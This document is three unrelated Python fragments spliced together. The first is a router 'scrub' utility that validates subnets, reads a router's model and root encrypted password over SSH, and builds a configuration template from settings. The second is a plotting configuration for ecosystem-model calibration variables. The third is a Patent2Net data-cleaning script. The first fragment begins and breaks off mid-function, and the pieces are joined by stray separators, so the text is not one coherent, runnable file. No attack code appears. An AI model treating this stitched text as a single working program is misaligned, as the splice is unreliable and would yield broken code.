'\u2502' + (' ' * 5) + '(colour_clear)Press (colour_cmd)Any key '
'(colour_clear)to exit.(colour_cmd)' + (' ' * 3) + '\u2502')
utils.colour_print(
'\u2502' + (' ' * 30) + '\u2502')
utils.colour_print(
'\u2515' + ('\u2501' * 30) + '\u2519(colour_clear)')
print()
def run_router(self):
try:
self.prompt()
if input() not in ['Y', 'y']:
return
utils.line_break()
print()
# loading settings data
utils.colour_print('Reading the settings file...')
# validating map_access_list
utils.colour_print('Validating MAP_ACCESS_LIST ...')
map_access_list = settings.MAP_ACCESS_LIST
for firewall in map_access_list:
self.validate_firewall(firewall)
clouds = settings.clouds
if clouds[0]['name'] in ['', None]:
utils.error(f'Invalid cloud name, Please edit the settings file correctly')
return
label = f'All available clouds in the settings file are:'
utils.colour_print(
'┌─────────────────────────────────────────────────┐',
)
utils.colour_print(f'│{label:^49}│')
utils.colour_print(
'├───────────┬─────────────────────────────────────┤',
)
utils.colour_print(
'│ id │ Name │',
)
utils.colour_print(
'├───────────┼─────────────────────────────────────┤',
)
cloud_ids = []
for cloud in clouds:
cloud_ids.append(cloud['id'])
utils.colour_print(f'│{cloud["id"]:^11}│{cloud["name"]:^37}│')
utils.colour_print(
'└───────────┴─────────────────────────────────────┘',
)
cloud_id = input(
utils.colour('(colour_warning)Select the cloud by entering "id" of the cloud.(colour_clear): '),
)
if cloud_id not in cloud_ids:
utils.error('Invalid cloud id, exiting. Please try again with correct cloud id.')
return
the_cloud = None
for cloud in clouds:
if cloud['id'] == cloud_id:
the_cloud = cloud
# validating the cloud settings
utils.colour_print('Validating COP_ACCESS_LIST ...')
cop_access_list = the_cloud['COP_ACCESS_LIST']
for firewall in cop_access_list:
self.validate_firewall(firewall)
pods = the_cloud['pods']
label = f'All available pods from the cloud #{the_cloud["name"]} are:'
utils.colour_print(
'┌───────────────────────────────────────────────────────────┐',
)
utils.colour_print(f'│{label:^59}│')
utils.colour_print(
'├───────────┬────────────────────────────────────┬──────────┤',
)
utils.colour_print(
'│ id │ Name │ Type │',
)
utils.colour_print(
'├───────────┼────────────────────────────────────┼──────────┤',
)
pod_ids = []
for pod in pods:
pod_ids.append(pod['id'])
utils.colour_print(f'│{pod["id"]:^11}│{pod["name"]:^36}│{pod["type"]:^10}│')
utils.colour_print(
'└───────────┴────────────────────────────────────┴──────────┘',
)
pod_id = input(
utils.colour('(colour_warning)Select the pod by entering "id" of the pod.(colour_clear): '),
)
if pod_id not in pod_ids:
utils.error('Invalid pod id, exiting. Please try again with correct pod id.')
return
the_pod = None
for pod in pods:
if pod['id'] == pod_id:
the_pod = pod
public_port_config = []
# validating the pod settings
utils.colour_print('validating IPv4_link_subnet...')
for subnet in the_pod['IPv4_link_subnet']:
if subnet['address_range'] != '':
if not self.validate_address(subnet['address_range']):
utils.error(f'Invalid address_range in IPv4_link_subnet #{subnet}')
exit()
if not self.validate_address(subnet['gateway']):
utils.error(f'Invalid gateway in IPv4_link_subnet #{subnet}')
exit()
public_port_config.append(subnet)
utils.colour_print('validating IPv4_pod_subnets...')
for subnet in the_pod['IPv4_pod_subnets']:
if not self.validate_address(subnet['address_range']):
utils.error(f'Invalid address_range in IPv4_pod_subnets #{subnet}')
exit()
if not self.validate_address(subnet['gateway']):
utils.error(f'Invalid gateway in IPv4_link_subnet #{subnet}')
exit()
public_port_config.append(subnet)
utils.colour_print('validating IPv6_link_subnet...')
for subnet in the_pod['IPv6_link_subnet']:
if not self.validate_address(subnet['address_range']):
utils.error(f'Invalid address_range in IPv6_link_subnet #{subnet}')
exit()
if not self.validate_address(subnet['gateway']):
utils.error(f'Invalid gateway in IPv6_link_subnet #{subnet}')
exit()
public_port_config.append(subnet)
mgmt_port_config = []
utils.colour_print('validating IPv6_pod_subnets...')
for subnet in the_pod['IPv6_pod_subnets']:
if not self.validate_address(subnet['address_range']):
utils.error(f'Invalid address_range in IPv6_pod_subnets #{subnet}')
exit()
address = subnet['address_range'].split('/')
subnet['address_range'] = f'{address[0]}10:0:1/64'
subnet['gateway'] = f'{address[0]}10:0:1'
mgmt_port_config.append(subnet)
utils.colour_print('validating IPv4_RFC1918_subnets...')
for subnet in the_pod['IPv4_RFC1918_subnets']:
if not self.validate_address(subnet['address_range']):
utils.error(f'Invalid address_range in IPv4_RFC1918_subnets #{subnet}')
exit()
if not self.validate_address(subnet['gateway']):
utils.error(f'Invalid gateway in IPv4_RFC1918_subnets #{subnet}')
exit()
mgmt_port_config.append(subnet)
access_addrs = map_access_list + cop_access_list
mgmt_access_addresses = []
for item in access_addrs:
# an address is defined with name in router, the name can be any unique so is taken from ip address
# itself by converting its non integers like '.' , '/', ':' to '-'.
item['source_address_name'] = ADDRESS_NAME_SUB_PATTERN.sub('-', item['source_address'])
item['destination_address_name'] = ADDRESS_NAME_SUB_PATTERN.sub('-', item['destination_address'])
mgmt_access_addresses.append(item)
template_data: Optional[Dict[str, Any]]
template_data = {
'name_servers': settings.ROUTER_NAME_SERVERS,
'mgmt_access_addresses': mgmt_access_addresses,
'robot_rsa': settings.ROBOT_RSA,
'rocky_rsa': settings.ROCKY_RSA,
'administrator_encryp_pass': settings.ADMINISTRATOR_ENCRYP_PASS,
'api_user': settings.API_USER_PASS,
'radius_server_address': settings.RADIUS_SERVER_ADDRESS,
'radius_server_secret': settings.RADIUS_SERVER_SECRET,
'location': the_pod['location'],
'name': the_pod['name'],
}
utils.line_break()
print()
# Get the oob router
utils.colour_print('(colour_prompt)Please enter correct OOB ip of the router to be scrubbed(colour_clear).')
utils.colour_print('\r - e.g 10.S.R.U where S:site number; R:rack number; U:unit location')
utils.colour_print('\r - each must be in range 0-254')
oob_ip = self.user_input_valid_address('')
utils.line_break()
print()
# SSHing into router for router model
utils.colour_print('(colour_prompt)Fetching the router model...(colour_clear)')
router_model = RouterScrub.router_model(oob_ip)
if not router_model:
utils.error(f'Failed to fetch router model for given ip #{oob_ip}, Check the oob ip and try again.')
return
utils.colour_print(
f'The router model for given ip #{oob_ip} is (colour_success){router_model}(colour_clear)',
)
utils.line_break()
print()
# oob 10.S.R.U S:site; R:rack; U:unit
template_data['router'] = {
'router_ip': oob_ip,
'router_location': oob_ip.replace('.', ''), # 10SRU
'router_model': router_model,
}
# sshing into router for root encrypted password
utils.colour_print('(colour_prompt)Fetching the root encrypted password...(colour_clear)')
root_encrypt_password = RouterScrub.root_encrypted_password(oob_ip)
if not root_encrypt_password:
utils.error(f'Failed to fetch root encrypted password from router.')
return
utils.colour_print(
f'Found root encrypted password of router #{oob_ip}',
)
template_data['root_encrypted_password'] = root_encrypt_password
utils.line_break()
print()
# confirm if router model is fibre or copper in case SRX345-DUAL-AC
if router_model in ['SRX345-DUAL-AC', 'SRX345']:
router_model = 'SRX345'
utils.colour_print('(colour_prompt)Type of router cabling: ')
utils.colour_print('(colour_prompt)\r - 1. Copper')
utils.colour_print('(colour_prompt)\r - 2. Fibre')
option = ''
while option not in ['1', '2']:
option = utils.user_input_validate(
utils.colour('(colour_warning)Please enter "1" for Copper or "2" for Fibre.(colour_clear)'),
)
if str(option) == '1':
router_model = f'{router_model}-Copper'
utils.colour_print(f'(colour_prompt)Preparing router scrub for {router_model}...(colour_clear)')
if str(option) == '2':
router_model = f'{router_model}-Fibre'
utils.colour_print(f'(colour_prompt)Preparing router scrub for {router_model}...(colour_clear)')
else:
utils.colour_print(f'(colour_prompt)Preparing router scrub for {router_model}...(colour_clear)')
utils.line_break()
print()
# Prepare the router's specs from json.
try:
with open('data/router_specs.json', 'r') as f:
template_data['ports'] = json.load(f)['routers'][f'{router_model}']
except:
utils.error('An error occurred while preparing router scrub')
traceback.print_exc()
return
# Collect the template data.
for port in template_data['ports']:
# oob is already taken
if port['function'] == 'OOB':
port['port_configs'].append(
{
'ip': oob_ip,
'mask': 16, # /16 for oob is by design, if changes should reflect here.
'type': 'inet',
'gateway': f'10.{oob_ip.split(".")[1]}.0.1',
},
)
# Management
if port['function'] == 'Management':
for address in mgmt_port_config:
ip = address['address_range'].split('/')
port['port_configs'].append(
{
'ip': ip[0],
'mask': ip[1],
'type': 'inet6' if netaddr.IPAddress(ip[0]).version == 6 else 'inet',
'gateway': address['gateway'],
},
)
# Public
if port['function'] == 'Floating':
for address in public_port_config:
ip = address['address_range'].split('/')
port['port_configs'].append(
{
'ip': ip[0],
'mask': ip[1],
'type': 'inet6' if netaddr.IPAddress(ip[0]).version == 6 else 'inet',
'gateway': address['gateway'],
},
)
# All data check
label = f'Router #{router_model} {oob_ip} ports and IPs'
utils.colour_print(
'┌─────────────────────────────────────────────────────────────────────────────────────────┐',
)
utils.colour_print(f'│{label:^89}│')
utils.colour_print(
'├───────────┬─────────────┬───────────────────────────┬───────┬───────────────────────────┤',
)
utils.colour_print(
'│ Name │ Function │ IPs │ Mask │ Gateway │',
)
utils.colour_print(
'├───────────┼─────────────┼───────────────────────────┼───────┼───────────────────────────┤',
)
for port in template_data['ports']:
function = port['function']
name = port['name']
if function != 'Private':
port_configs = port['port_configs']
for i, ip in enumerate(port_configs):
# proper print
if i == 0:
utils.colour_print(
f'│{name:^11}│{function:^13}│{ip["ip"]:^27}│{ip["mask"]:^7}│{ip["gateway"]:^27}│',
)
else:
utils.colour_print(
f'│{"":^11}│{"":^13}│{ip["ip"]:^27}│{ip["mask"]:^7}│{ip["gateway"]:^27}│',
)
else:
utils.colour_print(
f'│{name:^11}│{function:^13}│{"-":^27}│{"-":^7}│{"-":^27}│',
)
utils.colour_print(
'└───────────┴─────────────┴───────────────────────────┴───────┴───────────────────────────┘')
utils.line_break()
yes = input(
utils.colour('If you want to continue press Y or y, else press any key to stop.: '),
)
utils.line_break()
print()
if yes in ['Y', 'y']:
RouterScrub.scrub(template_data)
except:
utils.error('An error occurred while configuring ports on router')
traceback.print_exc()
@staticmethod
def validate_address(address):
"""
validates the given address or address range
"""
try:
if netaddr.IPNetwork(address):
return True
except:
address = address
utils.colour_print(f'(colour_warning) {address} is not | |
<filename>calibration/configured_suites.py<gh_stars>10-100
##########################################################################
#
# Configure different suites here
#
##########################################################################
# A suite is an assemblage of variables to plot in one or more sub-plots
# along with some configuration and meta-data about the variables (i.e.
# which variables to group in which sub-plots and what units/labels to use.
# Sample suite with comments:
# 'standard' : {
# 'desc': "some help text about this suite", # Notes
# 'rows': 1, # rows of subplots to create
# 'cols': 1, # columns of subplots to create NOTE: must be 1 for now!!
# 'traces': [
# {
# 'jsontag': 'GPPAll', # The variable name in json file
# 'axesnum': 0, # Which subplot axes to draw on
# 'units': 'gC/m^2', # Label for y axis?
# 'pft': '', # Empty tag indicating this is a pft variable
# # Omit for non-pft variables!
#
# 'pftpart': 'Leaf' # Leaf, Stem, or Root. Only if 'pft' key is present!
# },
# ]
# }
configured_suites = {
'Calibration': {
'desc': "Calibrated variables (variables for which we have targets values)",
'rows':8,
'cols':1,
'traces': [
{ 'jsontag': 'GPPAllIgnoringNitrogen', 'units': 'gC/m^2', 'axesnum': 0, 'pft': '', },
{ 'jsontag': 'NPPAllIgnoringNitrogen', 'units': 'gC/m^2', 'axesnum': 0, 'pft': '', },
{'jsontag': 'NPPAll', 'axesnum': 1, 'units':'gC/m^','pft': '',},
# Targets file call for "Nuptake", but that is not output in cal json files!
# Closest match might be InNitrogenUptakeAll
#{'jsontag': 'Nuptake', 'axesnum': 2, 'units':'gC/m^2','pft': '',},
#{'jsontag': 'InNitrogenUptakeAll', 'axesnum': 2, 'units': 'gN/m^2',},
{'jsontag': 'TotNitrogenUptake', 'axesnum': 2, 'units': 'gN/m^2', 'pft':'', },
{'jsontag': 'StNitrogenUptake', 'axesnum': 2, 'units': 'gN/m^2', 'pft': '', },
{'jsontag': 'LabNitrogenUptake', 'axesnum': 2, 'units': 'gN/m^2', 'pft': '', },
{'jsontag': 'VegCarbon', 'axesnum': 3, 'units': 'gC/m^2','pft': '', 'pftpart': 'Leaf'},
{'jsontag': 'VegCarbon', 'axesnum': 3, 'units': 'gC/m^2','pft': '', 'pftpart': 'Stem'},
{'jsontag': 'VegCarbon', 'axesnum': 3, 'units': 'gC/m^2','pft': '', 'pftpart': 'Root'},
{'jsontag': 'VegStructuralNitrogen', 'axesnum': 4, 'units': 'gN/m^2', 'pft': '', 'pftpart': 'Leaf'},
{'jsontag': 'VegStructuralNitrogen', 'axesnum': 4, 'units': 'gN/m^2', 'pft': '', 'pftpart': 'Stem'},
{'jsontag': 'VegStructuralNitrogen', 'axesnum': 4, 'units': 'gN/m^2', 'pft': '', 'pftpart': 'Root'},
{'jsontag': 'MossDeathC', 'axesnum': 5,},
{'jsontag': 'CarbonShallow', 'axesnum': 6,},
{'jsontag': 'CarbonDeep', 'axesnum': 6,},
{'jsontag': 'CarbonMineralSum', 'axesnum': 6,},
{'jsontag': 'OrganicNitrogenSum', 'axesnum': 7,},
{'jsontag': 'AvailableNitrogenSum', 'axesnum': 7,},
]
},
'Environment': {
'desc': "Environmental variables plot (precip, temps, light, water)",
'rows': 5,
'cols': 1,
'traces': [
{ 'jsontag': 'TShlw', 'axesnum': 0, },
{ 'jsontag': 'TDeep', 'axesnum': 0, },
{ 'jsontag': 'TMineA', 'axesnum': 0, },
{ 'jsontag': 'TMineB', 'axesnum': 0, },
{ 'jsontag': 'TMineC', 'axesnum': 0},
{ 'jsontag': 'TAir', 'axesnum': 0, },
{ 'jsontag': 'Snowfall', 'axesnum': 1, },
{ 'jsontag': 'Rainfall', 'axesnum': 1, },
{ 'jsontag': 'EET', 'axesnum': 1, },
{ 'jsontag': 'PET', 'axesnum': 1, },
{ 'jsontag': 'VPD', 'axesnum': 1, },
{ 'jsontag': 'WaterTable', 'axesnum': 2, },
{ 'jsontag': 'ActiveLayerDepth', 'axesnum': 2, },
{ 'jsontag': 'VWCShlw', 'axesnum': 3, },
{ 'jsontag': 'VWCDeep', 'axesnum': 3, },
{ 'jsontag': 'VWCMineA', 'axesnum': 3, },
{ 'jsontag': 'VWCMineB', 'axesnum': 3, },
{ 'jsontag': 'VWCMineC', 'axesnum': 3, },
{ 'jsontag': 'PARAbsorb', 'axesnum': 4, },
{ 'jsontag': 'PAR', 'axesnum': 4, },
]
},
'Soil': {
'desc': "A set of carbon soil variables.",
'rows': 6,
'cols': 1,
'traces': [
{ 'jsontag': 'LitterfallNitrogenPFT', 'axesnum': 0, 'units': 'gN/m^2', 'pft': '', },
{ 'jsontag': 'TotNitrogenUptake', 'axesnum': 0, 'units': 'gN/m^2', 'pft': '', },
{ 'jsontag': 'CarbonShallow', 'axesnum': 1, 'units': 'gC/m^2', },
{ 'jsontag': 'CarbonDeep', 'axesnum': 1, 'units': 'gC/m^2', },
{ 'jsontag': 'CarbonMineralSum', 'axesnum': 2, 'units': 'gC/m^2', },
{ 'jsontag': 'OrganicNitrogenSum', 'axesnum':3, 'units': 'gN/m^2', },
{ 'jsontag': 'AvailableNitrogenSum', 'axesnum':4, 'units': 'gN/m^2', },
{ 'jsontag': 'StNitrogenUptakeAll', 'axesnum': 4, 'units': 'gN/m^2', },
{ 'jsontag': 'InNitrogenUptakeAll', 'axesnum': 4, 'units': 'gN/m^2', },
{ 'jsontag': 'RH', 'axesnum': 5, 'units': 'gC/m^2',},
{ 'jsontag': 'RHraw', 'axesnum': 5, 'units': 'gC/m^2',},
{ 'jsontag': 'RHsoma', 'axesnum': 5, 'units': 'gC/m^2',},
{ 'jsontag': 'RHsomcr', 'axesnum': 5, 'units': 'gC/m^2',},
{ 'jsontag': 'RHsompr', 'axesnum': 5, 'units': 'gC/m^2',},
]
},
'Vegetation':{
'desc': "The standard targetted vegetation outputs",
'rows': 5,
'cols': 1,
'traces': [
{ 'jsontag': 'GPPAllIgnoringNitrogen', 'units': 'gC/m^2', 'axesnum': 0, 'pft': '', },
{ 'jsontag': 'NPPAllIgnoringNitrogen', 'units': 'gC/m^2', 'axesnum': 0, 'pft': '', },
{ 'jsontag': 'GPPAll', 'axesnum': 1, 'units': 'gC/m^2', 'pft': '', },
{ 'jsontag': 'NPPAll', 'axesnum': 1, 'units': 'gC/m^2', 'pft': '', },
{ 'jsontag': 'VegCarbon', 'axesnum': 2, 'units': 'gC/m^2','pft': '', 'pftpart': 'Leaf'},
{ 'jsontag': 'VegCarbon', 'axesnum': 2, 'units': 'gC/m^2','pft': '', 'pftpart': 'Stem'},
{ 'jsontag': 'VegCarbon', 'axesnum': 2, 'units': 'gC/m^2','pft': '', 'pftpart': 'Root'},
{ 'jsontag': 'LitterfallCarbonAll', 'axesnum': 2, 'units': 'gC/m^2', 'pft': '', },
{ 'jsontag': 'VegStructuralNitrogen', 'axesnum': 3, 'units': 'gN/m^2', 'pft': '', 'pftpart': 'Leaf'},
{ 'jsontag': 'VegStructuralNitrogen', 'axesnum': 3, 'units': 'gN/m^2', 'pft': '', 'pftpart': 'Stem'},
{ 'jsontag': 'VegStructuralNitrogen', 'axesnum': 3, 'units': 'gN/m^2', 'pft': '', 'pftpart': 'Root'},
{ 'jsontag': 'LitterfallNitrogenPFT', 'axesnum': 4, 'units': 'gN/m^2', 'pft': '', },
{ 'jsontag': 'TotNitrogenUptake', 'axesnum': 4, 'units': 'gN/m^2', 'pft': '', }
]
},
'VegExtra':{
'desc': "Some extra vegetation outputs",
'rows': 5,
'cols': 1,
'traces': [
{ 'jsontag': 'GPP', 'units': '', 'axesnum': 0, 'pft': '', 'pftpart':'Leaf' },
{ 'jsontag': 'GPP', 'units': '', 'axesnum': 0, 'pft': '', 'pftpart':'Stem' },
{ 'jsontag': 'GPP', 'units': '', 'axesnum': 0, 'pft': '', 'pftpart':'Root' },
{ 'jsontag': 'NPP', 'units': '', 'axesnum': 1, 'pft': '', 'pftpart':'Leaf' },
{ 'jsontag': 'NPP', 'units': '', 'axesnum': 1, 'pft': '', 'pftpart':'Stem' },
{ 'jsontag': 'NPP', 'units': '', 'axesnum': 1, 'pft': '', 'pftpart':'Root' },
{ 'jsontag': 'LitterfallCarbon', 'units': '', 'axesnum': 2, 'pft': '', 'pftpart':'Leaf' },
{ 'jsontag': 'LitterfallCarbon', 'units': '', 'axesnum': 2, 'pft': '', 'pftpart':'Stem' },
{ 'jsontag': 'LitterfallCarbon', 'units': '', 'axesnum': 2, 'pft': '', 'pftpart':'Root' },
{ 'jsontag': 'LitterfallNitrogen', 'units': '', 'axesnum': 3, 'pft': '', 'pftpart':'Leaf' },
{ 'jsontag': 'LitterfallNitrogen', 'units': '', 'axesnum': 3, 'pft': '', 'pftpart':'Stem' },
{ 'jsontag': 'LitterfallNitrogen', 'units': '', 'axesnum': 3, 'pft': '', 'pftpart':'Root' },
{ 'jsontag': 'RespMaint', 'units': '', 'axesnum': 4, 'pft': '', 'pftpart':'Leaf' },
{ 'jsontag': 'RespMaint', 'units': '', 'axesnum': 4, 'pft': '', 'pftpart':'Stem' },
{ 'jsontag': 'RespMaint', 'units': '', 'axesnum': 4, 'pft': '', 'pftpart':'Root' },
{ 'jsontag': 'RespGrowth', 'units': '', 'axesnum': 4, 'pft': '', 'pftpart':'Leaf' },
{ 'jsontag': 'RespGrowth', 'units': '', 'axesnum': 4, 'pft': '', 'pftpart':'Stem' },
{ 'jsontag': 'RespGrowth', 'units': '', 'axesnum': 4, 'pft': '', 'pftpart':'Root' },
]
},
'VegSoil':{
'desc': "The standard targetted vegetation and soil outputs",
'rows': 9,
'cols': 1,
'traces': [
{ 'jsontag': 'GPPAllIgnoringNitrogen', 'units': 'gC/m^2', 'axesnum': 0, 'pft': '', },
{ 'jsontag': 'NPPAllIgnoringNitrogen', 'units': 'gC/m^2', 'axesnum': 0, 'pft': '', },
{ 'jsontag': 'GPPAll', 'axesnum': 0, 'units': 'gC/m^2', 'pft': '', },
{ 'jsontag': 'NPPAll', 'axesnum': 0, 'units': 'gC/m^2', 'pft': '', },
{ 'jsontag': 'VegCarbon', 'axesnum': 1, 'units': 'gC/m^2', 'pft': '', 'pftpart': 'Leaf'},
{ 'jsontag': 'VegCarbon', 'axesnum': 1, 'units': 'gC/m^2', 'pft': '', 'pftpart': 'Stem'},
{ 'jsontag': 'VegCarbon', 'axesnum': 1, 'units': 'gC/m^2', 'pft': '', 'pftpart': 'Root'},
{ 'jsontag': 'LitterfallCarbonAll', 'axesnum': 1, 'units': 'gC/m^2', 'pft': '', },
{ 'jsontag': 'VegStructuralNitrogen', 'axesnum': 2, 'units': 'gN/m^2', 'pft': '', 'pftpart': 'Leaf'},
{ 'jsontag': 'VegStructuralNitrogen', 'axesnum': 2, 'units': 'gN/m^2', 'pft': '', 'pftpart': 'Stem'},
{ 'jsontag': 'VegStructuralNitrogen', 'axesnum': 2, 'units': 'gN/m^2', 'pft': '', 'pftpart': 'Root'},
{ 'jsontag': 'LitterfallNitrogenPFT', 'axesnum': 3, 'units': 'gN/m^2', 'pft': '', },
{ 'jsontag': 'TotNitrogenUptake', 'axesnum': 3, 'units': 'gN/m^2', 'pft': '', },
{ 'jsontag': 'CarbonShallow', 'axesnum': 4, 'units': 'gC/m^2', },
{ 'jsontag': 'CarbonDeep', 'axesnum': 4, 'units': 'gC/m^2', },
{ 'jsontag': 'CarbonMineralSum', 'axesnum': 5, 'units': 'gC/m^2', },
{ 'jsontag': 'OrganicNitrogenSum', 'axesnum':6, 'units': 'gN/m^2', },
{ 'jsontag': 'AvailableNitrogenSum', 'axesnum':7, 'units': 'gN/m^2', },
{ 'jsontag': 'StNitrogenUptakeAll', 'axesnum': 7, 'units': 'gN/m^2', },
{ 'jsontag': 'InNitrogenUptakeAll', 'axesnum': 7, 'units': 'gN/m^2', },
{ 'jsontag': 'MossDeathC', 'axesnum': 8, 'units': 'gC/m^2', },
{ 'jsontag': 'MossdeathNitrogen', 'axesnum': 8, 'units': 'gC/m^2', },
]
},
'NCycle':{
'desc': "Viewing annual N cycle outputs",
'rows': 7,
'cols': 1,
'traces': [
{ 'jsontag': 'NetNMin', 'axesnum':0, 'units': 'gN/m^2', },
{ 'jsontag': 'NetNImmob', 'axesnum':0, 'units': 'gN/m^2', },
{ 'jsontag': 'VegStructuralNitrogen', 'axesnum': 1, 'units': 'gN/m^2', 'pft': '', 'pftpart': 'Leaf'},
{ 'jsontag': 'VegStructuralNitrogen', 'axesnum': 1, 'units': 'gN/m^2', 'pft': '', 'pftpart': 'Stem'},
{ 'jsontag': 'VegStructuralNitrogen', 'axesnum': 1, 'units': 'gN/m^2', 'pft': '', 'pftpart': 'Root'},
{ 'jsontag': 'VegLabileNitrogen', 'axesnum': 1, 'units': 'gN/m^2', 'pft': '', },
{ 'jsontag': 'LitterfallNitrogenPFT', 'axesnum': 2, 'units': 'gN/m^2', 'pft': '', },
{ 'jsontag': 'TotNitrogenUptake', 'axesnum': 2, 'units': 'gN/m^2', 'pft':'', },
{ 'jsontag': 'StNitrogenUptake', 'axesnum': 2, 'units': 'gN/m^2', 'pft': '', },
{ 'jsontag': 'LabNitrogenUptake', 'axesnum': 2, 'units': 'gN/m^2', | |
# -*- coding: utf-8 -*-
"""
Created on Fri Jan 22 06:55:02 2021
@author: david
"""
import os
import pickle
import sys
import matplotlib.cm
import networkx as nx
import pandas as pd
from Patent2Net.P2N_Config import LoadConfig
from Patent2Net.P2N_Lib import LoadBiblioFile, UrlPatent, UrlApplicantBuild, UrlInventorBuild, UrlIPCRBuild, \
cmap_discretize, RenderTemplate
# from Patent2Net.P2N_Lib_Acad import IPCCategorizer, IPCExtractPredictionBrevet,PubMedCheckNameAndGetAffiliation, OPSChercheAbstractBrevet
from Patent2Net.P2N_Lib_Acad import NoPunct
def swap(x,y):
return y,x
def swapList(liste):
assert(len(liste) == 2)
return [liste[1], liste[0]]
def cycle (liste):
tempo = []
if len(liste) < 1:
return None
else:
taille = len(liste)-1
for indice in range(taille):
tempo.append((liste [indice], liste[indice+1]))
return tempo
# les trucs à virer des différents champs
Exclus = ['', ' ', 'empty', None, "none", "EMPTY"]
#####
# =============================================================================
#
# # CHARGEMENT des données brevet
#
# # =============================================================================
configFile = LoadConfig()
# Les champs nécessaires par brevet.
NeededInfo = ['label', 'date', 'inventor', 'title', 'abstract']
requete = configFile.requete
projectName = configFile.ndf
ndf = "Families"+ projectName
BiblioPath = configFile.ResultBiblioPath
ResultBiblioPath = configFile.ResultBiblioPath
temporPath = configFile.temporPath
ResultGephiPath = configFile.ResultGephiPath
ResultPathContent= configFile.ResultContentsPath
ResultAbstractPath = configFile.ResultAbstractPath
Auteur = configFile.ResultPath + '//AcadCorpora'
RepDir = configFile.ResultPath + '//AcadCorpora'
project = RepDir
for ndf in [projectName, "Families"+ projectName]:
if 'Description'+ndf in os.listdir(BiblioPath): # NEW 12/12/15 new gatherer append data to pickle file in order to consume less memory
print( "loading patent biblio data with ", " and ".join(NeededInfo), " fields.")
DataBrevet = LoadBiblioFile(BiblioPath, ndf)
print("Hi this is AcadStats processor. Bibliographic data of ", ndf, " patent universe found.")
print("Nice, ", len(DataBrevet["brevets"]), u" patents found")
# loading file from preProcessNormalisationNames
# inventors names are normalised there
if "InventeurNormes.pkl" in os.listdir(ResultBiblioPath + '//'):
with open(ResultBiblioPath + '//InventeurNormes.pkl', 'rb' ) as fic:
Inventeur_Norm = pickle.load(fic)
else:
Inventeur_Norm = dict()
for cle in Inventeur_Norm.keys():
Inventeur_Norm [cle] = [truc.title() for truc in Inventeur_Norm [cle]]
InvNormes = [aut.title() for cle in Inventeur_Norm.keys() for aut in Inventeur_Norm [cle]]
InvNormes = list(set(InvNormes))
# =============================================================================
# Paramètres
# =============================================================================
screenX = 1500 # taille des canevas de graphe par défaut
screenY = 1000
dicoAttrs = dict() # attributes for patent nodes
dicoAttrsAppli = dict() # attributes for applicant nodes..
dicoAttrsAut = dict() # attributes for author nodes
dicoAttrsCitP = dict()
dicoAttrsCitedBy = dict()
dicoAttrsEquiv = dict()
dicoAttrsOut = dict()
dicoAttrsTechno = dict()
Applicants = set ()
Techno = dict()
Inventeurs = set()
# =============================================================================
#
# Cleaning stuff and dataframe loading
#
# =============================================================================
df = pd.DataFrame(DataBrevet["brevets"])
# Rajout de colonne au df
df ['family lenght'] = 0
df ['IPCR11-range'] = df ['IPCR11'].apply(len)
df ['IPCR4-range'] = df ['IPCR4'].apply(len)
df ['IPCR7-range'] = df ['IPCR7'].apply(len)
# chargement du fichier famille puis calcul des tailles de famille par brevet
if ndf.startswith('Families'):
switch=''
else:
switch='Families'
print("\n> Hi! This is Net processor used on:", ndf)
if 'Description' + switch+ndf in os.listdir(ResultBiblioPath):
with open(ResultBiblioPath + '//' + switch+ndf, 'r') as data:
dico = LoadBiblioFile(ResultBiblioPath, switch +ndf)
else: # Retrocompatibility
print("please use Comptatibilizer")
sys.exit()
if 'Families' not in ndf:
df_Fam = pd.DataFrame(dico ["brevets"])
for bre in df['label']:
try:
df['family lenght'].loc[df.index[df['label'] == bre]] = df_Fam['family lenght'].loc[df_Fam.index[df_Fam['label'] == bre]].values[0]
except:
df['family lenght'].loc[df.index[df['label'] == bre]] = 0 #df_Fam['family lenght'].loc[df_Fam.index[bre in df_Fam['equivalents']]].values[0]
# print (df_Fam['family lenght'].loc[df_Fam.index[df_Fam['label'] == bre]])
#cleaning df. These steps should be placed in preProcessNames
for bre in df.itertuples():
if isinstance(bre.label, list):
df.at [bre.Index, 'label' ] = bre.label[0]
if isinstance(bre.Citations, list):
df.at [bre.Index, 'Citations' ] = bre.Citations[0]
if isinstance(bre.equivalents, str):
if bre.equivalents not in Exclus:
df.at [bre.Index, 'equivalents' ] = [bre.equivalents]
else:
df.at [bre.Index, 'equivalents' ] = []
# normalising and cleaning
if not isinstance(bre.inventor, list):
if bre.inventor.strip() not in Exclus:
if ''.join(bre.inventor).strip().lower() != 'empty':
temp = bre.inventor.replace('-', ' ')
df.at [bre.Index, 'inventor' ] = [temp.title()]
else:
df.at [bre.Index, 'inventor' ] = []
else:
df.at [bre.Index, 'inventor' ] = []
else:
tempoinv = []
for inv in bre.inventor:
if ''.join(inv).strip().lower() != 'empty':
inv = inv.replace('-', ' ')
if inv.strip() not in Exclus:
tempoinv.append(inv.title())
df.at [bre.Index, 'inventor' ] = tempoinv
if not isinstance(bre.applicant, list):
if bre.applicant not in Exclus and bre.applicant not in bre.inventor:
if ''.join(bre.applicant).strip().lower() != 'empty':
df.at [bre.Index, 'applicant' ] = [bre.applicant.upper()]
else:
df.at [bre.Index, 'applicant' ] = []
else:
df.at [bre.Index, 'applicant' ] = []
else:
tempoappl = []
for appl in bre.applicant:
if ''.join(appl).strip().lower() != 'empty' and appl not in bre.inventor:
tempoappl.append(appl.upper())
df.at [bre.Index, 'applicant' ] = tempoappl
for appl in bre.applicant:
if appl not in bre.inventor and appl not in Exclus:
Applicants. add(appl.upper())
# special clean qu'on sait pas d'où çà sort
if isinstance(bre.IPCR11, list):
if len(bre.IPCR11) == 1:
df.at [bre.Index, 'IPCR11' ] = [''.join (bre.IPCR11)]
if isinstance(bre.IPCR7, list):
if len(bre.IPCR7) == 1:
df.at [bre.Index, 'IPCR7' ] = [''.join (bre.IPCR7)]
if isinstance(bre.IPCR4, list):
if len(bre.IPCR4) == 1:
df.at [bre.Index, 'IPCR4' ] = [''.join (bre.IPCR4)]
if isinstance(bre.IPCR3, list):
if len(bre.IPCR3) == 1:
df.at [bre.Index, 'IPCR3' ] = [''.join (bre.IPCR3)]
if not isinstance(bre.IPCR11, list):
if bre.IPCR11 not in Exclus:
if ''.join(bre.IPCR11).strip().lower() != 'empty':
df.at [bre.Index, 'IPCR11' ] = [bre.IPCR11.replace('/', '-')]
else:
df.at [bre.Index, 'IPCR11' ] = []
else:
df.at [bre.Index, 'IPCR11' ] = []
else:
tempoinv = []
for inv in bre.IPCR11:
inv = inv.replace('/', '-')
if ''.join(inv).strip().lower() != 'empty':
if inv.strip() not in Exclus:
tempoinv.append(inv.upper())
